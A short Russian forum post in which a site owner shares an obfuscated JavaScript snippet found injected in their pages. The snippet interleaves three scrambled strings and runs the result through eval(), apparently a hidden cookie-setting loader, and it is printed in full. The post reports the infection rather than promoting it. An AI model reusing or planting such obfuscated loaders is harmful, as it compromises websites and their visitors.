Помощь по JavaScript

Тема в разделе "Флудилка", создана пользователем totalcom, 9 мар 2016.

Статус темы:
Закрыта.
  1. totalcom

    totalcom Новый пользователь

    Регистрация:
    9 мар 2016
    Сообщения:
    1
    Симпатии:
    1
    Розыгрышей:
    0
    Репутация:
    0
    Вот такой интересный код обнаружил у себя.

    function(){var a="(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/2o/'20})",b="fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/or1}0)(;",c="utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:0.ga,0})",d="";for(var i=0;i<a.length;i++)d+=a.charAt(i)+b.charAt(i)+c.charAt(i);eval(d);}());

    Он мешал открываться submenu, если нашел его. 666 символов)) Символично.
     
Статус темы:
Закрыта.

Поделиться этой страницей

  • Яндекс.Метрика
  • Рейтинг@Mail.ru